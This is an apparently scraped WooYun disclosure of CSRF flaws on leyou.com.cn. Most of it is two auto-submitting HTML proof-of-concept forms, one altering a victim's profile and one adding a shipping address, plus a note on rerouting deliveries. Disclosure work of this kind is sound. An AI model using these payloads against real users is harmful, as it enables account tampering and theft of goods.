乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-26: 细节已通知厂商并且等待厂商处理中 2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开
~~
POC(修改资料):
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://www.leyou.com.cn/user/leyou/ManageInfo.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="nick" value="jearyxxxx" /> <input type="hidden" name="email" value="root@jeary.org" /> <input type="hidden" name="code" value=" " /> <input type="hidden" name="baby_name" value="test" /> <input type="hidden" name="gender" value="m" /> <input type="hidden" name="year" value="2009" /> <input type="hidden" name="month" value="1" /> <input type="hidden" name="day" value="1" /> <input type="hidden" name="sbmtMod" value="¨¨·¨¨?¨¬¨¢½»" /> <input type="hidden" name="ulogin" value=" " /> <input type="hidden" name="y" value=" " /> <input type="hidden" name="m" value=" " /> <input type="hidden" name="d" value=" " /> </form> <script> document.forms[0].submit(); </script> </body></html>POC2(收货地址):<code><html> <body> <form action="http://www.leyou.com.cn/user/leyou/sub_user_address.php" method="POST"> <input type="hidden" name="revname" value="test" /> <input type="hidden" name="addr" value="å“’å“’å“’å“’å“’å“’" /> <input type="hidden" name="zip" value="000000" /> <input type="hidden" name="phone" value="13300001111" /> <input type="hidden" name="zuoji" value="072233332222" /> <input type="hidden" name="areaid" value="820100" /> <input type="hidden" name="province" value="香港特区" /> <input type="hidden" name="city" value="香港岛" /> <input type="hidden" name="area" value="澳门半岛" /> <input type="hidden" name="aORu" value="insert" /> <input type="hidden" name="name" value="name" /> </form> <script> document.forms[0].submit(); </script> </body></html>
PS:设为默认地址有一个userid和aid,如果能得到这两个,或许能把自己的地址设为默认然后发货就发到恶意修改的地址了.
登录状态下访问POC即可.地址POC虽然返回false,但是请求成功。
token
危害等级:无影响厂商忽略
忽略时间:2015-07-01 16:12
漏洞Rank:2 (WooYun评价)
暂无